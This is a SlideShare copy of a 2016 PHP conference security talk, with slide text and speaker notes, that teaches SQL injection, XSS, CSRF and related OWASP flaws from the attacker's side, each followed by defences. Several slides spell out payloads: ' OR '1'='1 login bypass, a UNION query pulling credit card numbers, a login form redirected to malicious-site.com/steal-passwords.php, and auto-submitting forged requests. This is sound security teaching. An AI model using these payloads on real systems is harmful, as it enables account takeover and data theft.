Download to read offline
![Colin O’Dell
@colinodell
Lead Web Developer at Unleashed Technologies
PHP developer since 2002
league/commonmark maintainer
PHP 7 Upgrade Guide e-book author
php[world] 2015 CtF winner](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-2-2048.jpg)
![SQL Injection Basics
$value = $_REQUEST['value'];
SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' ";
$sql = "SELECT * FROM x WHERE y = '$value' ";
$database->query($sql);](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-10-2048.jpg)
![$val = $_REQUEST['value'];
$sql = "SELECT * FROM x WHERE y = '$val' ";
$database->query($sql);
Protecting Against
SQL Injection
Block input with special
characters](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-48-2048.jpg)
![Protecting Against
SQL Injection
Block input with special
characters
Escape user input
$value = $_REQUEST['value'];
$escaped = mysqli_real_escape_string($value);
$sql = "SELECT * FROM x WHERE y = '$escaped' ";
$database->query($sql);
' OR '1' = '1 ' OR '1' = '1
mysqli_real_escape_string()
SELECT * FROM x
WHERE y = '' OR '1' = '1'](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-49-2048.jpg)
![Protecting Against
SQL Injection
Block input with special
characters
Escape user input
$value = $_REQUEST['value'];
$escaped = mysqli_real_escape_string($value);
$sql = "SELECT * FROM x WHERE y = '$escaped' ";
$database->query($sql);
' OR '1' = '1 ' OR '1' = '1
mysqli_real_escape_string()
SELECT * FROM x
WHERE y = '' OR '1' = '1'](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-50-2048.jpg)
![Protecting Against
SQL Injection
Block input with special
characters
Escape user input
Use prepared statements
$mysqli = new mysqli("localhost", "user", "pass", "db");
$q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' ");
$q->bind_param(1, $_REQUEST['value']);
$q->execute();
Native PHP:
● mysqli
● pdo_mysql
Frameworks / Libraries:
● Doctrine
● Eloquent
● Zend_Db](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-51-2048.jpg)
![XSS Attack
Basics
$value = $_POST['value'];
$value = $rssFeed->first->title;
$value = db_fetch('SELECT x FROM table');
<?php echo $value ?>
Raw code/script
is injected onto a page](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-54-2048.jpg)
![Protecting
Against XSS
Attacks $value = $_POST['value'];
$value = db_fetch('SELECT value FROM table');
$value = $rssFeed->first->title;
<?php echo $value ?>](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-68-2048.jpg)
![Protecting
Against XSS
Attacks
• Filter user input
$value = strip_tags($_POST['value']);
$value = strip_tags(
db_fetch('SELECT value FROM table')
);
$value = strip_tags($rssFeed->first->title);
<?php echo $value ?>](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-69-2048.jpg)
![Protecting
Against XSS
Attacks
• Filter user input
• Escape user
input
$value = htmlspecialchars($_POST['value']);
$value = htmlspecialchars(
db_fetch('SELECT value FROM table')
);
$value = htmlspecialchars($rssFeed->first->title);
<?php echo $value ?>
<script> <script>
htmlspecialchars()](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-70-2048.jpg)
![Protecting
Against XSS
Attacks
• Filter user input
• Escape user
input
• Escape output
$value = $_POST['value'];
$value = db_fetch('SELECT value FROM table');
$value = $rssFeed->first->title;
<?php echo htmlspecialchars($value) ?>](https://image.slidesharecdn.com/gebhbkmwtryrodvbids0-signature-1b1295ff8d4f63c926cc99fe490d9488deb80d97cdf6a4560e5eb93d780d82cd-poli-160624212034/75/Hacking-Your-Way-To-Better-Security-Dutch-PHP-Conference-2016-71-2048.jpg)
Uploaded byColin O'Dell
Hacking Your Way To Better Security - Dutch PHP Conference 2016
The document discusses web application security, focusing on common vulnerabilities such as SQL injection and cross-site scripting (XSS). It outlines methods for detecting and exploiting these vulnerabilities from an attacker's perspective, while also providing strategies for protection, including escaping user input and using prepared statements. Additionally, it emphasizes the importance of ethical considerations in security testing, urging individuals to seek permission before testing systems they do not own.
More Related Content
Similar to Hacking Your Way To Better Security - Dutch PHP Conference 2016
![Hacking Your Way To Better Security - php[tek] 2016](https://cdn.slidesharecdn.com/ss_thumbnails/uqd0khzkrgkurabdbneg-signature-7dcd622b76c062c2eee3f98694b3b5ec21430a61a01fae765c25a1ac3086db5d-poli-160526150315-thumbnail.jpg?width=640&height=640&fit=bounds)
More from Colin O'Dell
![Automating Your Workflow with Gulp.js - php[world] 2016](https://cdn.slidesharecdn.com/ss_thumbnails/1hdltk6qyioyapbnbsuw-signature-ffa82ea34fcd60983c97ee8b9ba271b32b08a69dc912d673db21bd57dfcf8768-poli-161117191138-thumbnail.jpg?width=640&height=640&fit=bounds)
![Rise of the Machines: PHP and IoT - php[world] 2016](https://cdn.slidesharecdn.com/ss_thumbnails/2jzpbkqsquo5mxu7oudb-signature-8467784fc5aedfdbd5a9c94ce69651a7e0d34611ca4200017484ea2690e83d3c-poli-161116170421-thumbnail.jpg?width=640&height=640&fit=bounds)
![Releasing High-Quality Packages - php[world] 2018](https://cdn.slidesharecdn.com/ss_thumbnails/bz5wyzkrrzegldtwykqa-signature-3670eb77c491cb71535d0b3a90e09135651d8fc4e9572397ec836478d39deed5-poli-181114191507-thumbnail.jpg?width=640&height=640&fit=bounds)
![Automating Deployments with Deployer - php[world] 2018](https://cdn.slidesharecdn.com/ss_thumbnails/xamdmkcnqmmivllu5fr0-signature-d28101e5fa1800496725871fd6e41c7ab64bce1a21924d6067b898d91419f1b9-poli-181115151019-thumbnail.jpg?width=640&height=640&fit=bounds)
Hacking Your Way To Better Security - Dutch PHP Conference 2016
- 1. Hacking Your Way ToBetter Security Colin O'Dell @colinodell
- 2. Colin O’Dell @colinodell Lead WebDeveloper at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Upgrade Guide e-book author php[world] 2015 CtF winner
- 3. Goals Explore several topsecurity vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities
- 4. Disclaimers 1.NEVER test systemsthat aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
- 5.
- 6. OWASP Top 10 Regularpublication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks
- 9. SQL Injection Modifying SQL statementsto: Spoof identity Tamper with data Disclose hidden information
- 10. SQL Injection Basics $value= $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
- 11.
- 12. Username Password Log In admin Invalid usernameor password. Please try again. password'
- 13.
- 14. tail –n 1/var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
- 15. tail –n 1/var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ ~~ $
- 16.
- 17.
- 18. tail –n 1/var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
- 19. tail –n 1/var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
- 20. ~~~~~~~~ SELECT * FROMusers WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
- 21. SELECT * FROMusers WHERE username = 'admin' AND password = '' test '; ' test
- 22. SELECT * FROMusers WHERE username = 'admin' AND password = '' test '; ' test SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ~~~~~~~~~~~~~~~
- 23. SELECT * FROMusers WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
- 24. SELECT * FROMusers WHERE username = 'admin' AND password = '' '; ' SELECT * FROM users WHERE username = 'admin' AND password = '' '; ~~~
- 25. SELECT * FROMusers WHERE username = 'admin' AND password = '' ' '; ' ' SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ~~~~~~~~~~~~~~
- 26. SELECT * FROMusers WHERE username = 'admin' AND password = '' OR ' '; ' OR ' SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' ';
- 27. SELECT * FROMusers WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1 SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';
- 28.
- 29. Welcome Admin! Admin Menu: Givecustomer money Take money away Review credit card applications Close accounts
- 30.
- 31. Blind SQL Injection Invalidusername or password. Please try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result)
- 32. Username Password Log In admin ' AND(SELECT id FROM user LIMIT 1) = '
- 33. Username Password Log In admin ' AND(SELECT id FROM user LIMIT 1) = ' Unknown error. ErrorsQuery SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
- 34. Username Password Log In admin ' AND(SELECT id FROM user LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
- 35. Username Password Log In admin ' AND(SELECT id FROM users LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
- 36. Username Password Log In admin Invalid usernameor password. Please try again.
- 37.
- 38. SQL Injection -Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 }
- 39. SQL Injection -Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { }
- 40. SQL Injection -Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
- 41. SQL UNION Query Column1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION
- 42. SQL UNION Query Column1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION
- 43. SQL UNION Query Column1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION
- 44. SQL Injection -Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
- 45. SQL Injection -Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
- 46. SQL Injection -Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
- 47. SQL Injection -Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 }
- 48. $val = $_REQUEST['value']; $sql= "SELECT * FROM x WHERE y = '$val' "; $database->query($sql); Protecting Against SQL Injection Block input with special characters
- 49. Protecting Against SQL Injection Blockinput with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
- 50. Protecting Against SQL Injection Blockinput with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
- 51. Protecting Against SQL Injection Blockinput with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
- 52. Other Types ofInjection NoSQL databases OS Commands LDAP Queries SMTP Headers
- 53. XSS Cross-Site Scripting Injecting codeinto the webpage (for other users) • Execute malicious scripts • Hijack sessions • Install malware • Deface websites
- 54. XSS Attack Basics $value =$_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT x FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
- 55. XSS – Cross-SiteScripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
- 56. XSS – Cross-SiteScripting short.ly Paste a URL here Shorten
- 57. XSS – Cross-SiteScripting short.ly http://www.colinodell.com Shorten
- 58. XSS – Cross-SiteScripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL:http://www.colinodell.com
- 59. XSS – Cross-SiteScripting short.ly Please wait while we redirect you to http://www.colinodell.com
- 60. XSS – Cross-SiteScripting short.ly <script>alert('hello world!');</script> Shorten
- 61. XSS – Cross-SiteScripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X
- 62. XSS – Cross-SiteScripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL:
- 63. <p> Short URL: <a href="…">http://short.ly/3bs8a</a> </p> <p> OriginalURL: <a href="…"><script>alert('hello world!');</script></a> </p>
- 64. XSS – Cross-SiteScripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
- 65. XSS – Cross-SiteScripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL:
- 66. XSS – Cross-SiteScripting short.ly Please wait while we redirect you to
- 67. XSS – Cross-SiteScripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php';
- 68. Protecting Against XSS Attacks $value= $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
- 69. Protecting Against XSS Attacks • Filteruser input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
- 70. Protecting Against XSS Attacks • Filteruser input • Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> <script> htmlspecialchars()
- 71. Protecting Against XSS Attacks • Filteruser input • Escape user input • Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
- 72. Protecting Against XSS Attacks • Filteruser input • Escape user input • Escape output {{ some_variable }} {{ some_variable|raw }}
- 73. CSRF Cross-Site Request Forgery Executeunwanted actions on another site which user is logged in to. • Change password • Transfer funds • Anything the user can do
- 74. CSRF – Cross-SiteRequest Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
- 75. CSRF – Cross-SiteRequest Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
- 76. CSRF – Cross-SiteRequest Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
- 77. CSRF – Cross-SiteRequest Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
- 78. CSRF – Cross-SiteRequest Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done!
- 79. CSRF – Cross-SiteRequest Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten
- 80. CSRF – Cross-SiteRequest Forgery short.ly Please wait while we redirect you to X
- 81. Protecting Against CSRF Attacks Use randomizedCSRF tokens <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
- 82. Insecure Direct Object References Access &manipulate objects you shouldn’t have access to
- 83. Insecure Direct ObjectReferences
- 84. Insecure Direct ObjectReferences Beverly Coop
- 85. Insecure Direct ObjectReferences
- 86. Insecure Direct ObjectReferences
- 87. Insecure Direct ObjectReferences
- 88. Insecure Direct ObjectReferences
- 89. Protecting Against Insecure Direct ObjectReferences Check permission on data input • URL / route parameters • Form field inputs • Basically anything that’s an ID • If they don’t have permission, show a 403 (or 404) page
- 90. Protecting Against Insecure Direct ObjectReferences Check permission on data input Check permission on data output • Do they have permission to access this object? • Do they have permission to even know this exists? • This is not “security through obscurity”
- 91.
- 92.
- 93. Sensitive Data Exposure- CHANGELOG
- 94. Sensitive Data Exposure– composer.lock
- 95. Sensitive Data Exposure– composer.lock
- 96. Sensitive Data Exposure– .git
- 97. Sensitive Data Exposure– robots.txt
- 98. Private information thatis stored, transmitted, or backed-up in clear text (or with weak encryption) • Customer information • Credit card numbers • Credentials Sensitive Data Exposure
- 99. Security Misconfiguration &Components with Known Vulnerabilities Default accounts enabled; weak passwords • admin / admin Security configuration • Does SSH grant root access? • Are weak encryption keys used? Out-of-date software • Old versions with known issues • Are the versions exposed? • Unused software running (FTP server)
- 100. Components with KnownVulnerabilities
- 101. Components with KnownVulnerabilities
- 102. Components with KnownVulnerabilities
- 103. Protecting Against Sensitive DataExposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date • Install critical updates immediately • Install other updates regularly
- 104. Protecting Against Sensitive DataExposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root • Files which provide version numbers • README, CHANGELOG, .git, composer.lock • Database credentials & API keys • Encryption keys
- 105. Protecting Against Sensitive DataExposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption • Encrypt with a strong private key • Encrypt backups and data-in-transit • Use strong hashing techniques for passwords
- 106. Protecting Against Sensitive DataExposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems • Scan your systems with automated tools • Test critical components yourself • Automated tests • Manual tests
- 107. Next Steps Test yourown applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed
- 108.
- 109. Thanks! Slides & feedback: https://joind.in/talk/10819 ColinO'Dell @colinodell
Editor's Notes
- #2 NO NAME YET
- #3 14 years For those who aren’t familiar, Capture the Flag is a security competition I’m not sharing this brag, but rather Showing you don’t have to be a professional security researcher or pentester to be knowledgeable about security In fact, I think it’s critically important that all developers... Especially in this day and age I’d like to share some of that security knowledge with you today
- #4 “Goals of this intermediate-level talk”
- #5 “Asking forgiveness is easier than asking for permission” Not if you’re in jail ---- I might mention some real sites, but none are actually vulnerable Just make it easier to explain things since you’re probably familiar with how they’re supposed to function OUTRO: So for this talk, we’re going to talk through several of the OWASP Top 10 vulnerabilities
- #6 [CONT] So for this talk, we’re going to talk through several of the OWASP Top 10 vulnerabilities
- #7 Non-profit organization Provide free articles, resources, and tools for web security [NEXT]
- #8 Example
- #9 Each risk is documented with a description, detailed examples, mitigation techniques, and references to other helpful resources
- #21 [Quickly] #1 - You may notice this looks a lot like this one here… but with a little extra What if we could insert something other than “test” here – perhaps an “OR” condition that evaluates to TRUE? If so, that would cancel out the password check
- #31 Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not directly visible to the attacker. Instead, you use SQL injections to basically ask yes/no questions and use the different site behaviors to obtain the answers.
- #32 Syntax error - Single quote is missing its pair; query is structured differently than expected Table or column doesn’t exist If we know site is vulnerable and see this (#2), SQL injection almost worked Table and column names are valid Assertion failed SQL injection worked (definitely) Database and column names are valid Assertion succeeded or conditional bypassed So let’s abuse this to learn more about the database
- #33 Let’s try to figure out table and column names Probably a user table
- #34 Let’s try to figure out table and column names Probably a user table
- #35 Let’s try to figure out table and column names Probably a user table
- #36 Let’s try to figure out table and column names Probably a user table
- #37 Different error, so table definitely exists Repeat this process to learn more
- #38 But previous method is all guesswork What if… just show the data?
- #40 OUTRO: So that’s the desired functionality But what if this site was vulnerable? What could we do? Well…
- #41 Maybe we could somehow set the id to cause a SQL injection that ouputs other information we want. [CLICK TO ANIMATE] But how you ask? With the SQL UNION operator…
- #50 CLICK TO ANIMATE EXPLANATION [Double-escape]
- #51 OUTRO: Or better yet…
- #53 NO EXAMPLE!
- #55 [VISUAL EXAMPLE NEXT]
- #56 So when the server sends the code, The browser runs it as-is Just like all other HTML/JS that intentionally runs
- #61 (EXPLAIN CODE) This JS should create an alert popup window (SUBMIT)
- #65 AUDIO STARTS NEXT SLIDE
- #68 Ex 1: REDDIT NO 2ND EXAMPLE!!!!!!!
- #70 Some data loss Pastebin, Gist, etc
- #71 Safer, no data loss
- #73 Laravel blade – also automatic, similar syntax
- #79 OUTRO: Can also be done by using XSS
- #80 [FAST]
- #81 [CSRF TOKENS NEXT!!!]
- #82 [Cross site request forgery] What if we… Would that be safe?
- #83 NO! POST requests are vulnerable too. This is one of many common misconceptions some developers have. For example… #1 – yeah, but a form can make post requests #2 – no, JS can submit the form
- #86 Hidden value, only shown on our website, that only us and the current page know OTHER SITES CANT SEE THIS VALUE, ONLY THE USER (due to browser’s same-origin policy) NOT SAVED TO COOKIE OR AVAILABLE OUTSIDE WEBSITE! (AFTER BULLETS) Remember, the attacker doesn’t have access to their session or the HTML you generated dynamically for the particular user.
- #87 Hidden value, only shown on our website, that only us and the current page know OTHER SITES CANT SEE THIS VALUE, ONLY THE USER (due to browser’s same-origin policy) NOT SAVED TO COOKIE OR AVAILABLE OUTSIDE WEBSITE! (AFTER BULLETS) Remember, the attacker doesn’t have access to their session or the HTML you generated dynamically for the particular user.
- #89 Let’s imagine Facebook is vulnerable to [READ TITLE] Just change the 9 to an 8…
- #90 Even though Facebook never linked us here, we still got here And FB didn’t check again at _this_ point in time OUTRO: Fake example – FB doesn’t do this…
- #91 Facebook does check whether you’re authorized to see the image OUTRO: Not just limited to URLs…
- #94 If bank is vulnerable, and form is submitted, They won’t check the ID and allow the transfer to go through Bad!
- #95 #2 – I like Symfony because it whitelists values in values in dropdowns (…) #3 – Good guideline, but not all-encompassing rule
- #96 #3 – That means hiding the objects / IDs as the only measure of security What I mean is not disclosing information users shouldn’t see, or showing actions they can’t take
- #97 Actually three different vuln Similar enough
- #98 Is private data being exposed to the world?
- #104 OUTRO: So that’s sensitive data exposure. In a similar vein we have…
- #105 NO DROWN!
- #108 You might be thinking OMG they explain the attack? Yes, but it’s a good thing! Problem is: your version is exposed, hackers may know you’re vulnerable
- #109 #1 – If there’s a patch available, there’s also a hacker who can understand the original problem and create an exploit #2 – Otherwise software falls into decay and is extremely hard to upgrade when the next critical update rolls out
- #110 END: But really, you should hide them
- #112 Good advice in general for all security topics we’ve covered And that wraps up the last set of vulenerabilities we’re covering today
- #113 Podcasts Slashdot Subreddits